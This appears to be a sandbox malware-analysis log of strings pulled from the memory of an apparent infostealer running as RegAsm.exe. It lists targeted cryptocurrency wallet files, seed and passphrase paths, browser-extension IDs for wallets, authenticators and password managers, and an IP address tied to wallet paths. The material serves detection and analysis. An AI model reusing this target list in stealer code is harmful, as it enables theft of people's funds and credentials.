Source: RegAsm.exe, 00000003.00000002.1976459689.00000000015B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \ElectronCash\wallets\
Source: RegAsm.exe, 00000003.00000002.1976459689.00000000015B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000003.00000002.1976459689.00000000015B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000003.00000002.1976459689.00000000015B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: 78.46.229.36s\AppData\Roaming\\Exodus\exodus.wallet\\info.seco
Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: 78.46.229.36s\AppData\Roaming\\Exodus\exodus.wallet\\info.seco
Source: RegAsm.exe, 00000003.00000002.1976459689.00000000015B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000003.00000002.1976459689.00000000015B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000003.00000002.1976459689.00000000015B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: MetaMask\|1\|nkbihfbeogaeaoehlefnkodbefgpgknn\|1\|0\|0\|MetaMask\|1\|djclckkglechooblngghdinmeemkbgci\|1\|0\|0\|MetaMask\|1\|ejbalbakoplchlghecdalmeeeajnimhm\|1\|0\|0\|TronLink\|1\|ibnejdfjmmkpcnlpebklmnkoeoihofec\|1\|0\|0\|BinanceChainWallet\|1\|fhbohimaelbohpjbbldcngcnapndodjp\|1\|1\|0\|Yoroi\|1\|ffnbelfdoeiohenkjibnmadjiehjhajb\|1\|0\|0\|Coinbase\|1\|hnfanknocfeofbddgcijnmhnfnkdnaad\|1\|0\|1\|Guarda\|1\|hpglfhgfnhbgpjdenjgmdgoeiappafln\|1\|0\|1\|iWallet\|1\|kncchdigobghenbbaddojjnnaogfppfj\|1\|0\|0\|RoninWallet\|1\|fnjhmkhhmkbjkkabndcnnogagogbneec\|1\|0\|0\|NeoLine\|1\|cphhlgmgameodnhkjdmkpanlelnlohao\|1\|0\|0\|CloverWallet\|1\|nhnkbkgjikgcigadomkphalanndcapjk\|1\|0\|0\|LiqualityWallet\|1\|kpfopkelmapcoipemfendmdcghnegimn\|1\|0\|0\|Terra_Station\|1\|aiifbnbfobpmeekipheeijimdpnlpgpp\|1\|0\|0\|Keplr\|1\|dmkamcknogkgcdfhhbddcghachkejeap\|1\|0\|0\|AuroWallet\|1\|cnmamaachppnkjgnildpdmkaakejnhae\|1\|0\|0\|PolymeshWallet\|1\|jojhfeoedkpkglbfimdfabpdfjaoolaf\|1\|0\|0\|ICONex\|1\|flpiciilemghbmfalicajoolhkkenfel\|1\|0\|0\|Coin98\|1\|aeachknmefphepccionboohckonoeemg\|1\|0\|0\|EVER Wallet\|1\|cgeeodpfagjceefieflmdfphplkenlfk\|1\|0\|0\|KardiaChain\|1\|pdadjkfkgcafgbceimcpbkalnfnepbnk\|1\|0\|0\|Rabby\|1\|acmacodkjbdgmoleebolmdjonilkdbch\|1\|0\|0\|Phantom\|1\|bfnaelmomeimhlpmgjnjophhpkkoljpa\|1\|0\|0\|Oxygen (Atomic)\|1\|fhilaheimglignddkjgofkcbgekhenbh\|1\|0\|0\|PaliWallet\|1\|mgffkfbidihjpoaomajlbgchddlicgpn\|1\|0\|0\|NamiWallet\|1\|lpfcbjknijpeeillifnkikgncikgfhdo\|1\|0\|0\|Solflare\|1\|bhhhlbepdkbapadjdnnojkbgioiodbic\|1\|0\|0\|CyanoWallet\|1\|dkdedlpgdmmkkfjabffeganieamfklkm\|1\|0\|0\|KHC\|1\|hcflpincpppdclinealmandijcmnkbgn\|1\|0\|0\|TezBox\|1\|mnfifefkajgofkcjkemidiaecocnkjeh\|1\|0\|0\|Goby\|1\|jnkelfanjkeadonecabehalmbgpfodjm\|1\|0\|0\|RoninWalletEdge\|1\|kjmoohlgokccodicjjfebfomlbljgfhk\|1\|0\|0\|UniSat Wallet\|1\|ppbibelpcjmhbdihakflkdcoccbgbkpo\|1\|0\|0\|Authenticator\|0\|bhghoamapcdpbohphigoooaddinpkbai\|1\|1\|0\|GAuth Authenticator\|0\|ilgcnhelpchnceeipipijaljkblbcobl\|1\|1\|1\|Tronium\|1\|pnndplcbkakcplkjnolgbkdgjikjednm\|1\|0\|0\|Trust Wallet\|1\|egjidjbpglichdcondbcbdnbeeppgdph\|1\|0\|0\|Exodus Web3 Wallet\|1\|aholpfdialjgjfhomihkjbmgjidlcdno\|1\|0\|0\|Braavos\|1\|jnlgamecbpmbajjfhmmmlhejkemejdma\|1\|0\|0\|Enkrypt\|1\|kkpllkodjeloidieedojogacfhpaihoh\|1\|0\|0\|OKX Web3 Wallet\|1\|mcohilncbfahbmgdjkbpemcciiolgcge\|1\|0\|0\|Sender\|1\|epapihdplajcdnnkdeiahlgigofloibg\|1\|0\|0\|Hashpack\|1\|gjagmgiddbbciopjhllkdnddhcglnemk\|1\|0\|0\|GeroWallet\|1\|bgpipimickeadkjlklgciifhnalhdjhe\|1\|0\|0\|Pontem Wallet\|1\|phkbamefinggmakgklpkljjmgibohnba\|1\|0\|0\|Finnie\|1\|cjmkndjhnagcfbpiemnkdpomccnjblmj\|1\|0\|0\|Leap Terra\|1\|aijcbedoijmgnlmjeegjaglmepbmpkpi\|1\|0\|0\|Microsoft AutoFill\|0\|fiedbfgcleddlbcmgdigjgdfcggjcion\|1\|0\|0\|Bitwarden\|0\|nngceckbapebfimnlniiiahkandclblb\|1\|0\|0\|KeePass Tusk\|0\|fmhmiaejopepamlcjkncpgpdjichnecm\|1\|0\|0\|KeePassXC-Browser\|0\|oboonakemofpalcgghocfoadofidjkkk\|1\|0\|0\|Rise - Aptos Wallet\|1\|hbbgbephgojikajhfbomhlmmollphcad\|1\|0\|0\|Rainbow Wallet\|1\|opfgelmcmbiajamepnmloijbpoleiama\|1\|0\|0\|Nightly\|1\|fiikommddbeccaoicoejoniammnalkfa\|1\|0\|0\|Ecto Wallet\|1\|bgjogpoidejdemgoochpnkmdjpocgkha\|1\|0\|0\|Coinhub\|1\|jgaaimajipbpdogpdglhaphldakikgef\|1\|0\|0\|Leap Cosmos Wallet\|1\|fcfcfllfndlomdhbehjjcoimbgofdncg\|1\|0\|0\|MultiversX DeFi Wal
Source: RegAsm.exe, 00000003.00000002.1976459689.00000000015B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \Coinomi\Coinomi\wallets\
Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\MultiDoge\multidoge.wallet3
Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: 78.46.229.36s\AppData\Roaming\\Exodus\exodus.wallet\\info.seco
Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: 78.46.229.36s\AppData\Roaming\\Exodus\exodus.wallet\\seed.seco
Source: RegAsm.exe, 00000003.00000002.1976459689.00000000015B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\.
